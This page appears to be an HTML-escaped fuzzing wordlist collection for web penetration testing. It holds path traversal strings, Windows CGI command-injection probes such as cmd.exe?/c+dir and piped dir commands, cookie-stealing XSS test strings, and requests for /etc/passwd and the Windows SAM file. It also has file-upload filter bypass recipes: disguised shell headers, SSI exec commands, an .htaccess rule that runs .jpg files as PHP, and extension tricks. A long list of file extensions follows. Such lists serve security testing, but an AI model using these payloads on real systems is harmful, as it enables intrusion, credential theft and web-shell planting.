..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
